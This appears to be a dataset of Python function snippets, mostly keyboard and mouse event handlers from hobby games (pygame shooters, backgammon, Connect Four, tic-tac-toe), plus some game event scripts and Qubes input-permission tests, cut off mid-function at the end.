"def bindHotkeys(self):\r\n self.root.bind(\"s\",self.pause)\r\n self.root.bind(\"p\",self.play)\r\n self.root.bind(\"x\",self.stop)\r\n self.root.bind(\"<Right>\",lambda event, t=10: self.skipFor(event,t=t))\r\n self.root.bind(\"<Left>\",lambda event, t=-10: self.skipFor(event,t=t))\r\n self.bindDPHotkeys()", "def move_draught(event):\n global red_turn\n if(red_turn == False):\n return\n draught = board.find_withtag(CURRENT)[0]\n board.coords(draught,event.x-click_offset[0],event.y-click_offset[1],event.x-click_offset[0]+board_divisions,event.y-click_offset[1]+board_divisions)", "def click(self, event):\n x = self.ptgrid(event.x)\n y = self.ptgrid(event.y)\n \n # x = loc[0]\n # y = loc[1]\n\n # if self.gamestate == self.STATE_TITLE_SCREEN:\n # self.new_board()\n # self.gamestate = FIRST_PLAYER\n\n\n #duplication /!\\\n if (self.board[y][x] == self.EMPTY and self.p2pGame.isReady):\n if(self.p2pGame.playerTurn == 'X' and self.player == 1):\n self.new_move(x, y, self.player)\n\n if self.has_won(self.player):\n self.gamestate = self.STATE_GAME_OVER\n if self.player == 1:\n self.gameover_screen('X Gagne')\n data = \"--W:X\"\n else:\n self.gameover_screen('O Gagne')\n data = \"--W:O\"\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n\n\n elif self.is_a_draw():\n self.gamestate = self.STATE_GAME_OVER\n self.gameover_screen('Egalité')\n data = \"--D\"\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n\n else:\n data = \"--X:\"+ str(x) + \":\" + str(y)\n self.p2pGame.playerTurn = 'O'\n self.p2pGame.sendTicTacToeData(text=data)\n # self.gamestate = self.STATE_O_TURN\n #self.launch()\n elif(self.p2pGame.playerTurn == 'O' and self.player == 2):\n self.new_move(x, y, self.player)\n\n if self.has_won(self.player):\n self.gamestate = self.STATE_GAME_OVER\n if self.player == 1:\n self.gameover_screen('X Gagne')\n data = \"--W:X\"\n else:\n self.gameover_screen('O Gagne')\n data = \"--W:O\"\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n\n\n elif self.is_a_draw():\n self.gamestate = self.STATE_GAME_OVER\n self.gameover_screen('Egalité')\n data = \"--D\"\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n\n else:\n data = \"--O:\"+ str(x) + \":\" + str(y)\n self.p2pGame.playerTurn = 'X'\n self.p2pGame.sendTicTacToeData(text=data)\n # self.gamestate = self.STATE_O_TURN\n #self.launch()\n elif self.gamestate == self.STATE_GAME_OVER:\n #reset\n self.new_board()\n self.gamestate = self.FIRST_PLAYER\n self.p2pGame.sendPlayAgain(\"--A\")", "def selection_board_maintenance(self,x_cor,y_cor):\t\t\r\n\t\tfor event in pygame.event.get():\r\n\t\t\tif event.type == pygame.QUIT:\r\n\t\t\t\tpygame.display.quit()\r\n\t\t\t\tpygame.quit()\r\n\t\t\t\tquit() \r\n\r\n\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\r\n\t\t\t\t#print(\"mouse is pressed\")\r\n\t\t\t\t#everything begins here\r\n\t\t\t\tx_adjusted,y_adjusted,who_is_clicked,piece = Helping_Class.convert_coordinate(x_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t y_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'selection_bar')\r\n\t\t\t\t#print(who_is_clicked)\r\n\t\t\t\tif (self.selected_from_selection_bar + self.selected_from_board):\r\n\t\t\t\t\t#print(\"inside selected item one\")\r\n\t\t\t\t\tif Helping_Class._check_if_clicked_on_his_own_piece_(self.whose_move,who_is_clicked):\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tif self.pieces[piece].availability:\r\n\t\t\t\t\t\t\tself.selected_from_board = False\r\n\t\t\t\t\t\t\tself.selected_from_selection_bar = True\r\n\r\n\t\t\t\t\t\t\t#update \r\n\t\t\t\t\t\t\tself.selected_piece = piece\r\n\t\t\t\t\t\t\tself.selected_position =Helping_Class.selection_bar_reverse_mapping[piece]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\t#print(\"nothing is selected\")\r\n\t\t\t\t\t#check if clicked on his piece change then select it\r\n\t\t\t\t\tif Helping_Class._check_if_clicked_on_his_own_piece_(self.whose_move,who_is_clicked):\r\n\r\n\t\t\t\t\t\tif self.pieces[piece].availability:\r\n\t\t\t\t\t\t\tself.selected_from_selection_bar = True\r\n\r\n\t\t\t\t\t\t\t#update \r\n\t\t\t\t\t\t\tself.selected_piece = piece\r\n\t\t\t\t\t\t\tself.selected_position =(x_adjusted,y_adjusted)\r\n\t\t\t\t\t\t\t#print(self.selected_piece,self.selected_position,self.selected_from_selection_bar)\r\n\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#nothing to do\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\t\t\r\n\t\t\t\t\r\n\t\t\telse:\r\n\t\t\t\t#color change\r\n\t\t\t\t#who_is_clicked is dummy variable as no click has occurred\r\n\t\t\t\tx_adjusted,y_adjusted,who_is_clicked,piece = Helping_Class.convert_coordinate(x_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t y_cor,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'selection_bar')\r\n\r\n\t\t\t\tself.blit_piece = [(x_adjusted,y_adjusted),piece]", "def move_draught_begin(event):\n global red_draughts, white_draughts\n global board_array\n global click_offset\n global old_point\n draught = board.find_withtag(CURRENT)[0]\n click_offset = [event.x-board.coords(draught)[0],event.y-board.coords(draught)[1]] #How far off the click is from the coordinates of the draught it's moving\n bottom = (event.y-click_offset[1] >= board_height//2)\n point_left_edges = [board_divisions*i for i in xrange(0,15) if i != 7]\n if bottom == False:\n if(event.x-click_offset[0] == 7*board_divisions): #If on the white bar\n old_point = 25\n else:\n old_point = 12+point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0])))\n else:\n if(event.x-click_offset[0] == 7*board_divisions): #If on the red bar\n old_point = 0\n else:\n old_point = 13-point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0])))", "def process_IN_MOVE_SELF(self, event):", "def _check_keydown_events(self, event):\n if event.key == pygame.K_RIGHT:\n self.rocket.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.rocket.moving_left = True\n elif event.key == pygame.K_UP:\n self.rocket.moving_up = True\n elif event.key == pygame.K_DOWN:\n self.rocket.moving_down = True\n elif event.key == pygame.K_q:\n sys.exit()", "def test_020_mouse_keyboard_mouse_only(self):\n self.allow_service('qubes.InputMouse')\n self.setUpDevice(['BTN_LEFT', 'BTN_RIGHT', 'REL_X', 'REL_Y'] + keyboard_events)\n self.find_device_and_start_listener()\n self.emit_event('REL_X', 1)\n self.emit_event('REL_X', 1)\n self.emit_event('REL_Y', 1)\n self.emit_event('REL_Y', 1)\n self.emit_click('BTN_LEFT')\n\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawButtonPress', '1', {}])\n self.assertEvent(['RawButtonRelease', '1', {}])\n\n self.emit_event('KEY_A', 1)\n self.emit_event('KEY_B', 1)\n self.emit_event('KEY_C', 1)\n self.emit_event('KEY_D', 1)\n self.assertNoEvent(msg=\"keyboard should be denied\")", "def check_events(ai, var, screen, ship, shots, enemies, charges, shields, blasters, hub):\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tsys.exit()\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tkey_down(event, ai, var, screen, ship, shots, enemies, charges, shields, hub)\r\n\t\telif event.type == pygame.KEYUP:\r\n\t\t\tkey_up(event, ai, var, screen, ship, charges, shields, blasters, hub)", "def check_events(ai_settings, screen, stats, sb, play_button, ship, aliens, bullets):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(\n ai_settings,\n screen,\n stats,\n sb,\n play_button,\n ship,\n aliens,\n bullets,\n mouse_x,\n mouse_y,\n )", "def _check_keydown_events(self, event):\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n if event.key == pygame.K_RETURN:\n self.main.switch_gamestate(self, self.main.game_screen)", "def main():\n \n games = 'chess simon puzzle chess go slide go sudoku snake'.split()\n gi = 0\n game = games[gi]\n board = set_game(game)\n board.keys[K_t] = test\n \n while board.active:\n for event in pygame.event.get():\n board.do_event(event)\n if event.type == KEYDOWN:\n if event.key == K_g:\n gi = (gi + 1) % len(games)\n board = set_game(games[gi])\n \n board.update()\n \n pygame.quit()", "def setShortcuts(self):\n self.game.app.accept('mouse1', self.onMouse1Down)\n self.game.app.accept('mouse3', self.onMouse2Down)\n self.game.app.accept('space', self.onSpaceBarClear)\n if self.enableMouseCamControl == 1:\n self.game.app.accept('wheel_up', self.onMouseWheelUp)\n self.game.app.accept('wheel_down', self.onMouseWheelDown)", "def event11510090():\n header(11510090, 0)\n fog_wall, fog_sfx, intended_side_trigger_area, opposite_side_trigger_area = define_args('iiii')\n skip_if_this_event_slot_off(3)\n obj.disable(fog_wall)\n sfx.delete_map_sfx(fog_sfx, False)\n end()\n\n if_action_button_state_and_line_segment(1, 'region', intended_side_trigger_area, 0, 0, 0, 10010403,\n ReactionAttribute.human_or_hollow, 0, line_segment_endpoint_id=fog_wall)\n if_action_button_state_and_line_segment(2, 'region', opposite_side_trigger_area, 0, 0, 0, 10010407,\n ReactionAttribute.human_or_hollow, 0, line_segment_endpoint_id=fog_wall)\n if_condition_true(-1, 1)\n if_condition_true(-1, 2)\n if_condition_true(0, -1)\n skip_if_condition_true_finished(2, 2)\n warp.short_warp(CHR.Player, 'region', intended_side_trigger_area, -1)\n skip(1)\n warp.short_warp(CHR.Player, 'region', opposite_side_trigger_area, -1)\n anim.force_animation(CHR.Player, 7410)\n obj.disable(fog_wall)\n sfx.delete_map_sfx(fog_sfx, True)", "def _check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n # Modify game response when player presses a key\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n elif event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self.bomb_status = False\n self.settings.debomb()\n self._fire_bullet()\n mixer.music.load('E:\\Sky-Fall\\SOUNDS\\shots.ogg')\n mixer.music.play()\n elif event.key == pygame.K_b:\n self.bomb_status = True\n self.settings.bomb()\n self._fire_bullet() \n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)", "def handle_input(self, events):\n for event in events:\n if event.type == QUIT:\n sys.exit(0)\n\n elif event.type == MOUSEMOTION:\n if self.is_in_bounds(event.pos):\n self.editor_cursor_position = self.position_screen_to_grid(event.pos)\n if self.mode_paint:\n self.put_block()\n elif self.mode_erase:\n self.erase_block()\n elif event.type == MOUSEBUTTONDOWN:\n if event.button == MB_LEFT:\n if self.is_in_bounds(event.pos):\n self.put_block()\n self.mode_paint = True\n self.mode_erase = False\n elif event.button == MB_RIGHT:\n if self.is_in_bounds(event.pos):\n self.erase_block()\n self.mode_erase = True\n self.mode_paint = False\n elif event.button == MB_MIDDLE:\n if self.is_in_bounds(event.pos):\n self.pick_block()\n elif event.button == MB_WHEEL_DOWN:\n self.next_block_type()\n elif event.button == MB_WHEEL_UP:\n self.prev_block_type()\n # print str(self.mode_paint) + \" \" + str(self.mode_erase)\n elif event.type == MOUSEBUTTONUP:\n self.mode_paint = False\n self.mode_erase = False\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n # from GameStateMenu import GameStateMenu\n self.context[\"gamestate\"] = self.prev_state\n if event.key == K_MINUS or event.key == K_KP_MINUS:\n self.prev_block_type()\n elif event.key == K_EQUALS or event.key == K_KP_PLUS:\n self.next_block_type()\n elif event.key == K_0 or event.key == K_KP0:\n self.current_block_type = 0\n elif event.key == K_F5:\n self.save()\n elif event.key == K_F9:\n self.open()\n # else:\n # print event", "def check_events_lobby_screen(ai_settings, grid,screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # Back button\n if Rect(0, 0, 50, 50).collidepoint(pygame.mouse.get_pos()):\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n screen_status.lobby_screen_display = False\n screen_status.welcome_screen_display = True\n # Change name button\n elif Rect(780, 10, 110, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.text_input_box_display = True\n\n # Create/next/ready/start button\n elif Rect(920, 607, 100, 50).collidepoint(pygame.mouse.get_pos()):\n # create\n if button_status.lobby_screen_room_detail_display == 'none':\n if button_status.lobby_screen_room_list_display == 'N/A':\n button_status.lobby_screen_room_detail_display = 'my'\n button_status.lobby_screen_room_status = '1/2'\n button_status.lobby_screen_room_list_display = user.name\n\n #my next/ready/start\n elif button_status.lobby_screen_room_detail_display == 'my' and button_status.lobby_screen_room_status == '2/2':\n if button_status.lobby_screen_prepare_to_go_display == False:\n button_status.lobby_screen_prepare_to_go_display = True\n elif button_status.lobby_screen_prepare_to_go_display == True:\n # Click on ready\n if button_status.lobby_screen_my_ready_to_go == False:\n lobby_screen_to_other_ready_action(ai_settings, screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n\n\n # Click on play\n elif button_status.lobby_screen_my_ready_to_go == True and button_status.lobby_screen_other_ready_to_go == True:\n button_status.lobby_screen_game_start = True\n lobby_screen_game_start_action(ai_settings, grid,screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n\n\n\n # other Ready\n elif button_status.lobby_screen_room_detail_display == 'other' and button_status.lobby_screen_prepare_to_go_display == True:\n lobby_screen_to_other_ready_action(ai_settings, screen,buttons, screen_status, button_status, card_database_filter, user, player2)\n\n\n # click on ok on end screen warning sign\n elif Rect(1100, 642, 40, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.lobby_screen_end_screen_warning_button_display = ''\n\n # Join\n elif Rect(530, 230, 50, 30).collidepoint(pygame.mouse.get_pos()):\n if button_status.lobby_screen_room_detail_display == 'none':\n button_status.lobby_screen_room_detail_display = 'other'\n button_status.lobby_screen_room_status = '2/2'\n # quit\n elif Rect(920, 684, 100, 50).collidepoint(pygame.mouse.get_pos()):\n if button_status.lobby_screen_room_detail_display == 'my' or button_status.lobby_screen_room_detail_display == 'other':\n clear_text_file(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2)\n button_status.lobby_screen_room_detail_display = 'none'\n button_status.lobby_screen_room_list_display = 'N/A'\n #button_status.lobby_screen_room_status = '0/2'\n\n # When in lobby_prepare to go screen\n for i in range(1,7):\n # Display edit/delete buttons\n if Rect(85 + 180* (i-1), 165, 130,110).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list_index = str(i)\n\n # Click on Edit\n elif Rect(85 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n user.deck_list = make_card_list_from_string(line.replace('DECK_LIST_' + str(i) + ' = ', ''), ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2)\n if 'CHARACTER_' + str(i) in line:\n user.character_card = eval('card_' + line.replace('CHARACTER_' + str(i) + ' = ', '')[7:12])\n screen_status.build_deck_screen_display = True\n screen_status.lobby_screen_display = False\n\n # Click on Delete\n elif Rect(155 + 180* (i-1), 282, 60, 30).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) in line:\n\n with open('user_deck_list_string.txt','a+') as f:\n\n f.seek(0)\n x = f.readlines()\n y = 1\n\n f.seek(0)\n for line in f:\n if 'DECK_LIST_' + str(i) not in line:\n y += 1\n else:\n break\n\n del x[y-1] # Delete DECK_LIST_\n del x[y-1] # Delete CHARACTER_\n\n with open('user_deck_list_string.txt','w') as f:\n f.writelines(x)\n\n user.deck_list_index = 'new'\n\n # create new deck\n if Rect(1020, 110, 120, 35).collidepoint(pygame.mouse.get_pos()):\n with open('user_deck_list_string.txt','r') as f:\n f.seek(0)\n if len(f.readlines()) >= 12:\n pass\n\n else:\n user.deck_list_index = 'new'\n user.deck_list = []\n user.character_card = ''\n screen_status.build_deck_screen_display = True\n screen_status.lobby_screen_display = False", "def player_stage(niv): \n playing = True\n a = niv[0][0] \n b = niv[0][1] \n (x, y) = (a, b) \n state = [[a, b]] #Create a list with the starting point of the selected level patern.\n sense.stick.get_events()\n while playing:\n for event in sense.stick.get_events(): #It moves the pixel with the player moves and add the point passed by the player in the state[].\n if event.action == 'pressed':\n if event.direction == 'left':\n if x > 0:\n x = min(x-1, 7)\n state.append([x, y])\n elif event.direction == 'right':\n if x < 7:\n x = max(x+1, 0)\n state.append([x, y])\n if event.direction == 'down':\n if y < 7:\n y = min(y+1, 7)\n state.append([x, y])\n elif event.direction == 'up':\n if y > 0:\n y = max(y-1, 0)\n state.append([x, y])\n elif event.direction == 'middle':\n playing = False\n sense.set_pixel(x, y, RED)\n if state[:] == niv[:]: #Compare the way choosen by the player with the selected level patern. Results of the try.\n sense.show_message(\"WINNER !\",\n text_colour=LEMON, scroll_speed=0.05)\n sleep(2)\n main() #brings back to the level selection.\n else:\n sense.show_message(\"LOSER !\",\n text_colour=BLUE, scroll_speed=0.05)\n sleep(2)\n try_again(niv) #cf. try_again() function", "def keyCam(self, event):\n dct = {\n \"d\": 0,\n \"s\": 1,\n \"q\": 2,\n \"z\": 3\n }[event.char]\n self.moveAllSeg(dct)", "def test_010_mouse_deny_keyboard(self):\n self.allow_service('qubes.InputMouse')\n self.setUpDevice(mouse_events)\n self.find_device_and_start_listener()\n self.emit_event('KEY_A', 1)\n self.emit_event('KEY_B', 1)\n self.emit_event('KEY_C', 1)\n self.emit_event('KEY_D', 1)\n self.assertNoEvent(msg=\"keyboard should be denied\")", "def event11510450():\n header(11510450, 1)\n if_does_not_have_tae_event(0, CHR.Gwyndolin, 600)\n if_has_tae_event(0, CHR.Gwyndolin, 600)\n\n flag.disable_chunk(11515150, 11515151)\n flag.enable_random_in_chunk(11515150, 11515151)\n chr.disable(CHR.Gwyndolin)\n wait(1.0)\n\n # First two warps are always forward.\n skip_if_event_flag_on(2, 11515110)\n run_event_with_slot(11515110, 0, args=(1512710, 11515110))\n restart()\n skip_if_event_flag_on(2, 11515111)\n run_event_with_slot(11515110, 1, args=(1512711, 11515111))\n restart()\n\n for warp_number in range(2, 40):\n skip_if_event_flag_on(7, 11515110 + warp_number)\n\n skip_if_event_flag_on(2, 11515151)\n # Standard forward warp.\n run_event_with_slot(11515110, warp_number, args=(1512710 + warp_number, 11515110 + warp_number))\n skip(2)\n # Backward warp.\n flag.disable(11515110 + warp_number - 1) # Lose corridor progress.\n run_event_with_slot(11515110, warp_number - 2, args=(1512710 + warp_number - 2, 11515110 + warp_number - 2))\n\n chr.rotate_to_face_entity(CHR.Gwyndolin, CHR.Player)\n restart()", "def play_gui():\n global done\n GAME_OVER = False\n pygame.init()\n board = create_board()\n\n screen = pygame.display.set_mode(SIZE)\n draw_board(board, screen)\n pygame.display.update()\n\n myfont = pygame.font.SysFont(\"monospace\", 75)\n turn = np.random.randint(0, 2)\n\n while not GAME_OVER:\n g = Game()\n done = False\n transitions_agent = []\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n if event.type == pygame.MOUSEMOTION:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n posx = event.pos[0]\n if turn == PLAYER:\n pygame.draw.circle(screen, red, (posx, int(SQUARESIZE / 2)), RADIUS)\n pygame.display.update()\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n pygame.draw.rect(screen, black, (0, 0, WIDTH, SQUARESIZE))\n\n if turn == PLAYER:\n posx = event.pos[0]\n col = int(math.floor(posx / SQUARESIZE))\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, PLAYER_PIECE)\n\n if winning_move(board, PLAYER_PIECE):\n label = myfont.render(\"Player 1 wins!!\", 1, red)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n turn = (turn + 1) % 2\n draw_board(board, screen)\n\n # # Ask for Player 2 Input\n if turn == AI and not GAME_OVER:\n observation = []\n #print(f\"BOARD: {board}\")\n temp_board = np.flipud(board)\n for col in range(COLUMN_COUNT):\n col_elements = temp_board[:,col]\n for element in col_elements:\n observation.append(element)\n\n #print(f\"OBS: {observation}\")\n observation = np.asarray(observation)\n col = agent.choose_action(observation)\n\n if is_valid_location(board, col):\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2\n\n else:\n print(\"AI random choice\")\n col = np.random.randint(7)\n row = get_next_open_row(board, col)\n drop_piece(board, row, col, AI_PIECE)\n\n if winning_move(board, AI_PIECE):\n label = myfont.render(\"Player 2 wins!!\", 1, yellow)\n screen.blit(label, (40, 10))\n GAME_OVER = True\n\n draw_board(board, screen)\n turn = (turn + 1) % 2", "def move_draught_end(event):\n global red_draughts, white_draughts\n global board_array\n global old_point\n global die_1_num, die_2_num, doubles\n draught = board.find_withtag(CURRENT)[0]\n #Figure out which point they want to put it on\n bottom = (event.y-click_offset[1] >= board_height//2)\n point_left_edges = [board_divisions*i for i in xrange(0,15) if i != 7]\n is_red = draught in red_draughts\n if bottom == False:\n new_point = 12+point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0])))\n else:\n new_point = 13-point_left_edges.index(min(point_left_edges, key=lambda x:abs(x-event.x+click_offset[0]))) \n #Check legality\n if(board_array[new_point][1] > 1 and is_red) or (board_array[new_point][0] > 1 and not is_red): #if too many opposite color on square\n draw_draughts()\n return\n if(board_array[0][0] > 0 and is_red and old_point != 0)or(board_array[25][1] > 0 and not is_red and old_point != 25):#Obligated to move off bar first\n draw_draughts()\n return\n if(new_point == 0 and not is_red): #if white trying to bear off\n for i in xrange(7,26):\n if(board_array[i][1] > 0): #If white has a piece outside home, can't bear off\n draw_draughts()\n return\n if(new_point == 25 and is_red): #if red trying to bear off\n for i in xrange(0,18):\n if(board_array[i][0] > 0): #If red has a piece outside home, can't bear off\n draw_draughts()\n return \n \n if(new_point-old_point == die_1_num and is_red) or (old_point-new_point == die_1_num and not is_red):\n if(doubles == False) or (die_2_num != 0):\n die_1_num = 0\n else: \n die_2_num = die_1_num\n doubles = False\n elif(new_point-old_point == die_2_num and is_red) or (old_point-new_point == die_2_num and not is_red):\n if(doubles == False) or (die_1_num != 0):\n die_2_num = 0\n else: \n die_1_num = die_2_num\n doubles = False\n else: #Can't move there on this roll\n draw_draughts()\n return\n update_dice()\n #Update board_array\n if is_red:\n board_array[old_point][0] -= 1\n board_array[new_point][0] += 1\n if(board_array[new_point][1] == 1): #Handle hits\n board_array[new_point][1] -= 1\n board_array[25][1] += 1\n else:\n board_array[old_point][1] -= 1\n board_array[new_point][1] += 1\n if(board_array[new_point][0] == 1): #Handle hits\n board_array[new_point][0] -= 1\n board_array[0][0] += 1\n\n draw_draughts()\n if(die_1_num == 0 and die_2_num == 0):\n comp_turn()", "def make_turn(self):\n # if play first, start in the middle\n if np.count_nonzero(self.board) == 0:\n self.place_disc(self.board.shape[1] / 2)\n return 1\n\n\n # win if possible\n for try_column in range(0,self.board.shape[1]):\n if 0 == self.board[0, try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id())\n if dhw.did_he_win(new_board, self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't loose if in danger\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id())\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n self.place_disc(try_column)\n return 1\n\n # don't fall in trap!\n forbidden_columns = []\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, self.id()) # my move\n new_board = self.simulate_place_disc(new_board, try_column, 3 - self.id()) # enemy move\n if dhw.did_he_win(new_board, 3 - self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # don't ruin my trap\n for try_column in range(0, self.board.shape[1]):\n if 0 == self.board[0,try_column]:\n new_board = self.simulate_place_disc(self.board, try_column, 3 - self.id()) # 'my' move\n new_board = self.simulate_place_disc(new_board, try_column, self.id()) # my move\n if dhw.did_he_win(new_board, self.id(), try_column):\n if try_column not in forbidden_columns: forbidden_columns.append(try_column)\n\n # allow forbidden_columns if no other choice\n if np.count_nonzero(self.board[0, :]) == self.board.shape[1] - len(forbidden_columns):\n forbidden_columns = []\n\n # otherwise, play randomly\n rannum = random.randrange(7)\n while 0 != self.board[0, rannum] or rannum in forbidden_columns:\n rannum = random.randrange(7)\n self.place_disc(rannum)\n return 1", "def next(self):\n \n jump = 0\n \n for event in pudding.process_event():\n if event[0] == sdlconst.KEYDOWN:\n if (event[1] == sdlconst.K_q) or (event[1] == sdlconst.K_ESCAPE):\n tofu.GAME_INTERFACE.end_game() # Quit the game\n \n elif event[1] == sdlconst.K_m:\n print \"trying to change single to multiplayer mode\"\n tofu.GAME_INTERFACE.end_game('client')\n \n elif event[1] == sdlconst.K_LSHIFT:\n # Shift key is for jumping\n # Contrary to other action, jump is only performed once, at the beginning of\n # the jump.\n jump = 1\n \n elif event[1] == sdlconst.K_LEFT: self.left_key_down = 1\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 1\n elif event[1] == sdlconst.K_UP: self.up_key_down = 1\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 1\n \n elif event[0] == sdlconst.KEYUP:\n if event[1] == sdlconst.K_LEFT: self.left_key_down = 0\n elif event[1] == sdlconst.K_RIGHT: self.right_key_down = 0\n elif event[1] == sdlconst.K_UP: self.up_key_down = 0\n elif event[1] == sdlconst.K_DOWN: self.down_key_down = 0\n \n if jump: return Action(ACTION_JUMP)\n \n # People saying that Python doesn't have switch/select case are wrong...\n # Remember this if you are coding a fighting game !\n return Action({\n (0, 0, 1, 0) : ACTION_ADVANCE,\n (1, 0, 1, 0) : ACTION_ADVANCE_LEFT,\n (0, 1, 1, 0) : ACTION_ADVANCE_RIGHT,\n (1, 0, 0, 0) : ACTION_TURN_LEFT,\n (0, 1, 0, 0) : ACTION_TURN_RIGHT,\n (0, 0, 0, 1) : ACTION_GO_BACK,\n (1, 0, 0, 1) : ACTION_GO_BACK_LEFT,\n (0, 1, 0, 1) : ACTION_GO_BACK_RIGHT,\n }.get((self.left_key_down, self.right_key_down, self.up_key_down, self.down_key_down), ACTION_WAIT))", "def check_events(ai_settings,screen,stats,play_button,ship,aliens,bullets,sb):\n\t# Observe eventos de teclado e de mouse\n\tfor event in pygame.event.get():\n\t\t\n\t\tif event.type == pygame.QUIT:\n\t\t\t\n\t\t\tstats.file.stored_high_score(stats.high_score)\n\n\t\t\tsys.exit()\n\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_x,mouse_y = pygame.mouse.get_pos()\n\t\t\tcheck_play_button(ai_settings,screen,stats,play_button,ship\n\t\t\t\t,aliens,bullets,mouse_x,mouse_y,sb)\n\n\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\t\n\t\t\tcheck_keydown_events(event,ai_settings,screen,ship,bullets,stats,\n\t\t\t\taliens,sb)\n\n\t\telif event.type == pygame.KEYUP:\n\n\t\t\tcheck_keyup_events(event,ship)", "def manual_play(self):\r\n if self.manual_moves:\r\n move = self.manual_moves.pop()\r\n self.new_edge(move)\r\n return True\r\n\r\n self.mw.update() \r\n \r\n return False", "def main():\n #Initialize game\n game = QuoridorGame()\n run = True\n clock = pygame.time.Clock()\n move_type = None\n\n #Run loop\n while run:\n clock.tick(FPS)\n\n for event 